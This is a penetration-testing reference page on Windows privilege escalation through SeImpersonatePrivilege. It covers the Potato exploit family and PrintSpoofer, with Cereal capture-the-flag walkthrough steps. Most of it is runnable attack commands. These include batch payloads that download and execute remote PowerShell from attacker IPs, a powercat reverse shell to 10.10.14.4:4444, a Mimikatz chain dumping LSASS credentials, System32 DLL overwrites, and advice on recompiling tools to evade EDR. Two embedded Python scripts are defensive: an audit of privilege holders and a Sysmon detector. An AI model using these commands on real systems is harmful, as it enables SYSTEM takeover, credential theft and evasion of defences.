Privilege Impersonation

#Overview

The SeImpersonatePrivilege (and its sibling SeAssignPrimaryTokenPrivilege) allows a process to impersonate a client after authentication. When a privileged service (like SYSTEM) connects to an attacker-controlled named pipe, the attacker can impersonate the SYSTEM token and escalate. This is the foundation of the "Potato" family of exploits and PrintSpoofer.

#Prerequisites

  • A user with SeImpersonatePrivilege (check via whoami /priv)
  • Service accounts, IIS APPPOOL accounts, and local service accounts often have this privilege
  • Target Windows version determines which Potato variant works

#Detection & Enumeration

```cmd
whoami /priv
rem Look for:
rem SeImpersonatePrivilege        Impersonate a client after authentication   Enabled
rem SeAssignPrimaryTokenPrivilege Replace a process level token              Disabled
```

```powershell
# Check if Print Spooler is running (required for PrintSpoofer)
Get-Service Spooler | Format-Table Name,Status

# Check Windows version (determines Potato variant)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
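The defender-side counterpart of the check above is to audit which principals have been granted the two privileges across the host rather than in one session. The following is an added example, not code from the page or from any tool it lists: it parses the `[Privilege Rights]` section of a local security policy export (`secedit /export /cfg policy.inf`) and reports every holder outside the Windows default set. The export text, the `CORP\svc-deploy` account and the `S-1-5-21-...` SID are constructed for the example; the default-holder SIDs and the IIS_IUSRS SID are real.

```python
"""Audit who holds the impersonation privileges on a host.

Added example; not code from the original page or from any of the Potato
tools. It parses the [Privilege Rights] section of a local security policy
export (`secedit /export /cfg policy.inf`) and reports every holder that is
not part of the Windows default set. The export text below is constructed.
"""
from typing import Dict, List, Tuple

# Default holders on a clean install. SIDs: S-1-5-19 LOCAL SERVICE,
# S-1-5-20 NETWORK SERVICE, S-1-5-32-544 Administrators, S-1-5-6 SERVICE.
DEFAULT_HOLDERS: Dict[str, set] = {
    "SeImpersonatePrivilege": {"*S-1-5-19", "*S-1-5-20", "*S-1-5-32-544", "*S-1-5-6"},
    "SeAssignPrimaryTokenPrivilege": {"*S-1-5-19", "*S-1-5-20"},
}

# Constructed sample export. A real secedit export is UTF-16 LE on disk;
# see load_export() for reading one. S-1-5-32-568 is IIS_IUSRS, which the
# IIS role adds; CORP\svc-deploy and the S-1-5-21-... SID are made-up extras.
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,*S-1-5-32-568,CORP\\svc-deploy
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1105
SeDebugPrivilege = *S-1-5-32-544
"""


def parse_privilege_rights(text: str) -> Dict[str, List[str]]:
    """Return {privilege: [holder, ...]} from the [Privilege Rights] section."""
    rights: Dict[str, List[str]] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Holders are comma separated; SIDs carry a '*' prefix, plain names do not.
        rights[name.strip()] = [h.strip() for h in value.split(",") if h.strip()]
    return rights


def audit(rights: Dict[str, List[str]],
          baseline: Dict[str, set] = DEFAULT_HOLDERS) -> List[Tuple[str, str]]:
    """Return (privilege, holder) pairs for every holder not in the baseline."""
    findings: List[Tuple[str, str]] = []
    for priv, defaults in baseline.items():
        for holder in rights.get(priv, []):
            if holder not in defaults:
                findings.append((priv, holder))
    return findings


def load_export(path: str) -> Dict[str, List[str]]:
    """Parse a real export file; secedit writes it as UTF-16 LE."""
    with open(path, encoding="utf-16") as fh:
        return parse_privilege_rights(fh.read())


if __name__ == "__main__":
    for priv, holder in audit(parse_privilege_rights(SAMPLE_EXPORT)):
        print(f"non-default holder of {priv}: {holder}")
```

Every extra holder the audit prints is an account that, if its process is compromised, has the precondition for this whole module; the IIS_IUSRS entry is expected on a web server, while a domain service account or a custom SID on the list is worth a ticket.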

#Exploitation / Execution

#Potato Exploit Evolution

| Exploit | Windows Version | Technique |
|---|---|---|
| RottenPotato | < Windows 10 1809 | DCOM + BITS + named pipe |
| JuicyPotato | Windows 10 1809 + Server 2019 | DCOM/CLSID + named pipe |
| RoguePotato | Windows 10 1809 + Server 2019 | Rogue OXID Resolver |
| SweetPotato | Windows 10/11 + Server 2019/2022 | Multi-method (combines Juicy, Rogue, Efs) |
| PrintSpoofer | Windows 10/Server 2019 | Printer Bug + named pipe |
| GodPotato | Windows 10/11 + Server 2019/2022 | RPC + named pipe |
| EfsPotato | Windows 10/11 + Server 2019/2022 | EFS RPC + named pipe |
| PipePotato | Windows 10/11 + Server 2019/2022 | Named pipe + RPC |

#JuicyPotato

```cmd
rem Requires finding a valid CLSID for the target Windows version
rem CLSID list: https://github.com/ohpe/juicy-potato/tree/master/CLSID

rem Create a bat file with the payload
echo powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')" > C:\Users\Public\shell.bat

rem Execute JuicyPotato
.\JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.bat -t * -c {<CLSID>}
rem -l: COM listening port
rem -p: program to launch
rem -t: createprocess call (use * for both CreateProcessWithTokenW and CreateProcessAsUser)
rem -c: CLSID for the COM server
```

#PrintSpoofer

```cmd
rem Simplest to use -- no CLSID needed, works on Server 2019/2022
.\PrintSpoofer.exe -i -c "C:\Users\Public\shell.bat"
rem -i: interactive (inherit parent console)
rem -c: command to execute
```

#GodPotato

```cmd
rem Latest variant, works on most Windows versions including 11
.\GodPotato.exe -cmd "C:\Users\Public\shell.bat"
```

#SweetPotato (Custom Implementation)

Real example from Cereal: A custom SweetPotato variant was built to trigger via SSRF:

```csharp
// Modified PotatoAPI.cs Trigger method
using System.Net.Http;
using System.Text;

public bool Trigger()
{
    HttpClient client = new HttpClient();
    // GraphQL mutation whose sourceURL makes the privileged service connect back to the listener on 127.0.0.1:9999
    string body = "{\"query\":\"mutation {updatePlant(plantId: 1, version: 1, sourceURL: \\\"http://127.0.0.1:9999\\\") }\",\"variables\":null}";
    StringContent data = new StringContent(body, Encoding.UTF8, "application/json");
    HttpResponseMessage res = client.PostAsync("http://127.0.0.1:8080/api/graphql", data).Result;
    // Wait for impersonation...
    return res.IsSuccessStatusCode;
}

// WinRMListener on port 9999 with NTLM negotiation
// Impersonates the SYSTEM token received via NTLM auth
```

Cereal exploitation flow:

```powershell
# On the attacker host (10.10.14.4): fetch powercat and append the connect-back invocation
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
echo "powercat -c 10.10.14.4 -p 4444 -e cmd" >> powercat.ps1
# On the target: stage the bat file, fetch the custom potato binary and run it
Set-Content shell.bat -Value "powershell iex(iwr http://10.10.14.4/powercat.ps1 -useb)"
wget 10.10.14.4/modpotato.exe -O modpotato.exe
.\modpotato.exe -p C:\Users\Sonny\shell.bat
# Shell received as SYSTEM
```

#EfsPotato

```cmd
rem Exploits EFS RPC for impersonation
.\EfsPotato.exe -c "C:\Users\Public\shell.bat"
```

#CLSID Selection for JuicyPotato

```cmd
rem Test CLSIDs if the default doesn't work
rem Get OS version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

rem Windows 10 Enterprise/Pro:
rem CLSID: {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}, {0fb40f0d-1021-4022-8da0-aab0588dfc8b}

rem Windows Server 2016:
rem CLSID: {8BC3F05E-D86B-11D0-A075-00C04FB68820}, {9b1f122c-2982-4e91-aa8b-e071d54f2a4d}

rem Windows Server 2019:
rem CLSID: {6d18ad12-bde1-4393-b5fc-374e0839d6df}

rem Test a CLSID:
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {<CLSID>}
rem If it fails with "CLSID not found", try another
```

#Named Pipe Client Impersonation Chain

The underlying technique for all Potato variants:

  1. Create a named pipe server (the attacker)
  2. Force a privileged process (SYSTEM) to connect to the named pipe
  3. The SYSTEM process authenticates via NTLM
  4. The named pipe server calls ImpersonateNamedPipeClient()
  5. The server now has a SYSTEM impersonation token
  6. Duplicate the token and spawn a process with SYSTEM privileges
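The chain above has a telemetry shape a defender can key on: the process that owns the pipe server runs under a service identity, and moments after the pipe appears it acquires a child that runs as SYSTEM. The following is an added example, not code from the page or from any Potato tool, that flags exactly that sequence. It assumes events shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 17 (PipeCreated) with Sysmon's field names; the `EVENTS` list, pipe names and process ids are constructed, not recorded telemetry.

```python
"""Flag the Potato pattern in endpoint telemetry: a process running as a
service account creates a named pipe, then gets a child that runs as SYSTEM.

Added example, not code from the original page or any Potato tool. It
assumes events shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 17
(PipeCreated), with the field names Sysmon uses; the EVENTS list below is
constructed, not recorded telemetry.
"""
from datetime import datetime, timedelta
from typing import Dict, List

SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
# How far before the SYSTEM child a pipe creation by the parent still counts.
PIPE_WINDOW = timedelta(seconds=30)

EVENTS: List[dict] = [
    # IIS worker (app pool identity) starts a tool, which creates a pipe and
    # then gets a SYSTEM child: the full chain.
    {"EventID": 1, "UtcTime": "2024-05-01 10:00:00.000", "ProcessId": 4120, "ParentProcessId": 812,
     "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "User": "IIS APPPOOL\\DefaultAppPool"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:00:03.000", "ProcessId": 5300, "ParentProcessId": 4120,
     "Image": "C:\\Users\\Public\\tool.exe", "User": "IIS APPPOOL\\DefaultAppPool"},
    {"EventID": 17, "UtcTime": "2024-05-01 10:00:05.000", "ProcessId": 5300,
     "Image": "C:\\Users\\Public\\tool.exe", "PipeName": "\\pipe\\demo-pipe"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:00:07.000", "ProcessId": 6011, "ParentProcessId": 5300,
     "Image": "C:\\Windows\\System32\\cmd.exe", "User": SYSTEM_USER},
    # Benign: services.exe (SYSTEM) starting a service host; parent is already SYSTEM.
    {"EventID": 1, "UtcTime": "2024-05-01 10:01:00.000", "ProcessId": 700, "ParentProcessId": 600,
     "Image": "C:\\Windows\\System32\\services.exe", "User": SYSTEM_USER},
    {"EventID": 1, "UtcTime": "2024-05-01 10:01:01.000", "ProcessId": 7010, "ParentProcessId": 700,
     "Image": "C:\\Windows\\System32\\svchost.exe", "User": SYSTEM_USER},
    {"EventID": 17, "UtcTime": "2024-05-01 10:01:02.000", "ProcessId": 7010,
     "Image": "C:\\Windows\\System32\\svchost.exe", "PipeName": "\\pipe\\svc-demo"},
    # SYSTEM child of a NETWORK SERVICE parent with no pipe seen: weaker signal.
    {"EventID": 1, "UtcTime": "2024-05-01 10:02:00.000", "ProcessId": 8000, "ParentProcessId": 700,
     "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\NETWORK SERVICE"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:02:30.000", "ProcessId": 8100, "ParentProcessId": 8000,
     "Image": "C:\\Windows\\System32\\cmd.exe", "User": SYSTEM_USER},
]


def ts(value: str) -> datetime:
    """Parse Sysmon's UtcTime format."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def detect(events: List[dict]) -> List[dict]:
    """Return one hit per SYSTEM process whose parent does not run as SYSTEM.

    Severity is "high" when the parent created a named pipe within
    PIPE_WINDOW before the child started, otherwise "medium".
    """
    procs: Dict[int, dict] = {}            # pid -> most recent ProcessCreate
    pipes: Dict[int, List[tuple]] = {}     # pid -> [(time, pipe name), ...]
    hits: List[dict] = []
    for ev in sorted(events, key=lambda e: ts(e["UtcTime"])):
        if ev["EventID"] == 17:
            pipes.setdefault(ev["ProcessId"], []).append((ts(ev["UtcTime"]), ev["PipeName"]))
            continue
        if ev["EventID"] != 1:
            continue
        procs[ev["ProcessId"]] = ev   # pids recycle, so keep only the latest creation
        if ev["User"].upper() != SYSTEM_USER.upper():
            continue
        parent = procs.get(ev["ParentProcessId"])
        if parent is None or parent["User"].upper() == SYSTEM_USER.upper():
            continue
        started = ts(ev["UtcTime"])
        recent_pipes = [name for when, name in pipes.get(parent["ProcessId"], [])
                        if timedelta(0) <= started - when <= PIPE_WINDOW]
        hits.append({
            "severity": "high" if recent_pipes else "medium",
            "child_pid": ev["ProcessId"], "child_image": ev["Image"],
            "parent_pid": parent["ProcessId"], "parent_image": parent["Image"],
            "parent_user": parent["User"], "pipes": recent_pipes,
        })
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(f'[{hit["severity"]}] {hit["parent_user"]} ({hit["parent_image"]}) '
              f'-> SYSTEM child {hit["child_image"]} pipes={hit["pipes"]}')
```

Sysmon's ProcessCreate records the parent's image and pid but not the parent's account, which is why the parent's own Event ID 1 has to be kept and looked up. Legitimate SYSTEM children of non-SYSTEM parents do occur (brokered elevation, some installers), so the pipe-creation correlation is what lifts a hit from "review" to "page someone".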

#Potato Attack Comparison — Which Exploit Works Where?

| Variant | Requirements | Notes |
|---|---|---|
| RottenPotato | SeImpersonate | Original, outdated |
| JuicyPotato | SeImpersonate + CLSID | Win2019+ blocks CLSID |
| RoguePotato | SeImpersonate | Needs remote SMB listener |
| SweetPotato | SeImpersonate | Universal, multiple methods |
| PrintSpoofer | SeImpersonate | Simplest for 2019+ |
| GodPotato | SeImpersonate | Works on most versions |
| EfsPotato | SeImpersonate | Abuses EFS RPC |
| PipePotato | SeImpersonate | Named pipe impersonation |

Quick decision: On Windows Server 2019+ → try PrintSpoofer or GodPotato. On older systems → JuicyPotato.

#SeDebugPrivilege + SeImpersonatePrivilege Combined Workflow

```powershell
# Complete Mimikatz privilege escalation chain
mimikatz # privilege::debug          # Enable SeDebugPrivilege
Privilege '20' OK

mimikatz # token::elevate             # Elevate to SYSTEM using SeImpersonatePrivilege
Token Id : 0
User : SYSTEM

mimikatz # sekurlsa::logonpasswords   # Dump credentials from LSASS
# Now you have all credentials from memory

# One-liner alternative:
mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
```

#Additional Privilege Exploits

```powershell
# SeLoadDriverPrivilege — Load arbitrary kernel driver
# Create a malicious driver and load it for SYSTEM code execution
# Requires: SeLoadDriverPrivilege (e.g., Print Operators group)
# Tool: Capcom.sys driver loading technique
# Reference: https://github.com/TarlogicSecurity/EoPLoadDriver

# SeTakeOwnershipPrivilege — Take ownership of any file
takeown /f C:\Users\Administrator\Desktop\flag.txt /a
icacls C:\Users\Administrator\Desktop\flag.txt /grant Everyone:F
type C:\Users\Administrator\Desktop\flag.txt

# SeRestorePrivilege — Write to any file path
# Same as Backup Operators SeRestorePrivilege but can be held independently
# Allows overwriting critical system files (Copy-Item -Force; cmd's "copy /Y" switch is not valid in PowerShell):
Copy-Item -Force C:\temp\malicious.dll C:\Windows\System32\legitimate.dll
```

#PrintSpoofer Flags

```cmd
:: PrintSpoofer -i vs -c flag distinction
:: (comments on their own lines: cmd passes a trailing "::" and what follows to the program as arguments)
:: -i = interactive (for existing terminal sessions)
PrintSpoofer.exe -i -c cmd
:: -c = command execution (for reverse shells)
PrintSpoofer.exe -c "cmd /c C:\temp\reverse_shell.exe"
:: Use -i when you have an existing console, -c when running from a non-interactive context
```

#whoami /priv Interpretation

```cmd
:: Privilege to exploit mapping:
:: SeImpersonatePrivilege  → Potato attacks, PrintSpoofer, GodPotato
:: SeBackupPrivilege       → Read any file (SAM/SYSTEM, NTDS.dit)
:: SeRestorePrivilege      → Write any file (DLL hijack, service replacement)
:: SeDebugPrivilege        → Access LSASS process memory
:: SeTakeOwnershipPrivilege → Take ownership of any file
:: SeLoadDriverPrivilege   → Load kernel driver (SYSTEM code execution)
:: SeManageVolumePrivilege → Write to C:\ (privilege escalation via file replace)
:: SeCreateTokenPrivilege   → Create custom access tokens
:: SeAssignPrimaryTokenPrivilege → Assign tokens to processes
```

#Common Pitfalls

  • Windows Server 2019+ and Windows 10 1809+ broke RottenPotato; use JuicyPotato or newer variants
  • CLSID must be valid for the specific Windows version and build -- trial and error may be needed
  • PrintSpoofer requires Print Spooler service to be running (check Get-Service Spooler)
  • Some AV/EDR products block the DCOM/RPC calls used by Potato exploits
  • Named pipe creation may be restricted by security policies
  • The SYSTEM service may authenticate with anonymous credentials if the named pipe security descriptor is too permissive

#OPSEC Considerations

  • Potato exploits create named pipes and trigger DCOM/RPC calls -- these are signatured by most EDR products.
  • PrintSpoofer uses the Printer Bug which generates event log entries in the PrintService log.
  • The spawned SYSTEM process is visible in process trees and may trigger anomalous process creation alerts.
  • Running unknown executables (JuicyPotato.exe, GodPotato.exe) is a strong indicator of compromise.
  • Compile custom variants from source with renamed methods and strings to reduce signature-based detection.

#Post-Exploitation Value

Potato exploits provide immediate SYSTEM access with full privileges. From SYSTEM: dump LSASS credentials, extract SAM/SYSTEM, create new admin accounts, disable Defender, install persistent backdoors, pivot to domain resources with machine account credentials.

#Cross-References

#Tool References

| Tool | Link |
|---|---|
| JuicyPotato | https://github.com/ohpe/juicy-potato |
| PrintSpoofer | https://github.com/itm4n/PrintSpoofer |
| GodPotato | https://github.com/BeichenDream/GodPotato |
| SweetPotato | https://github.com/CCob/SweetPotato |
| EfsPotato | https://github.com/zcgonvh/EfsPotato |

#Source Machines

  • Cereal (Hard, Windows) - Custom SweetPotato via SSRF + NTLM impersonation on Windows Server 2019